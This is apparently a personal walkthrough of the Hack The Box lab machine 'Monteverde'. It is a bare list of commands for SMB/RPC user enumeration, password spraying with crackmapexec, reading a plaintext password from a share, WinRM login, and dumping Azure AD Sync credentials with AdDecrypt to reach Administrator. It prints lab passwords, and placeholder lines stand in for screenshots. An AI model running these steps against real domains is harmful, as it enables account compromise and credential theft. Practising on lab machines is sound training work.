Cu3rv0x
Monteverde

Monteverde


HTB Windows

nmap -A -p- -oA monteverde 10.10.10.172 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA monteverde 10.10.10.172

nmap -sU -O -p- -oA monteverde-udp 10.10.10.172

whichSystem 10.10.10.172

nmap -p- --open -T5 -v -n 10.10.10.172

echo "10.10.10.172 monteverde.htb MEGABANK.LOCAL" | sudo tee -a /etc/hosts

ssh_command.

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.10.172 -oG allPorts

ssh_command.

extractPorts allPorts

nmap -sCV -p53,88,135,139,389,445 10.10.10.179 -oN targeted

ssh_command.

bc targeted -l rb

crackmapexec smb 10.10.10.172 --shares

smbclient _l 10.10.10.172 -N

smbmap -h 10.10.10.172 -u ""

ssh_command.

rpcclient -U "" 10.10.10.172 -N -c "enumdomusers"

rpcclient -U "" 10.10.10.172 -N -c "enumdomgroups"

ssh_command.

querydispinfo

ssh_command.

rpcclient -U "" 10.10.10.172 -N -c "enumdomusers" | grep -oP '\[.*?\]' | grep -v '0x' | tr -d '[]' > users.txt

ssh_command.

GetNPUsers MEGABANK.LOCAL/ -no-pass -usersfile users.txt

ssh_command. crackmapexec smb 10.10.10.172 -u users.txt -p users.txt --continue-on-success

ssh_command.

crackmapexec smb 10.10.10.172 -u 'SABatchJobs' -p 'SABatchJobs' --shares

ssh_command.

smbmap -H 10.10.10.172 -u 'SABatchJobs' -p 'SABatchJobs'

smbmap -H 10.10.10.172 -u 'SABatchJobs' -p 'SABatchJobs' -r azure_uploads

ssh_command.

smbclient //10.10.10.172/azure_uploads -U "SABatchJobs%SABatchJobs"

ssh_command.

smbmap -H 10.10.10.172 -u 'SABatchJobs' -p 'SABatchJobs' -r 'users$

ssh_command.

smbmap -H 10.10.10.172 -u 'SABatchJobs' -p 'SABatchJobs' --download 'users$/mhope/azure.xml

ssh_command. cat azure.xml

ssh_command.

ssh_command.

crackmapexec winrm 10.10.10.172 -u 'SABatchJobs' -p 'SABatchJobs'

crackmapexec smb 10.10.10.172 -u users.txt -p passwords.txt

ssh_command.

crackmapexec winrm 10.10.10.172 -u users.txt -p passwords.txt

cat passwords.txt

ssh_command.

evil-winrm -i 10.10.10.172 -u 'mhope' -p '4notherD4y@nother$'

ssh_command.

type user.txt

ssh_command.

whoami /priv

ssh_command.

net user mhope

ssh_command.

whoami /all

ssh_command.

dir

ssh_command.

https://github.com/VbScrub/AdSyncDecrypt/releases/tag/v1.0

Bajamos el archivo AdDecrypt.zip

ssh_command.

upload AdDecrypt.exe

upload mcrypt.dll

ssh_command.

cd "Program Files\Microsoft Azure AD Sync\Bin"

C:\Windows\Temp\Privesc\AdDecypt.exe -FullSQL

ssh_command.

crackmapexec winrm 10.10.10.172 -u users.txt -p passwords.txt

ssh_command.

evil-winrm -i 10.10.10.172 -u 'Administrator' -p 'd0m@ain4dminyeah!'

ssh_command.

type root.txt

ssh_command.

© 2025 Cu3rv0x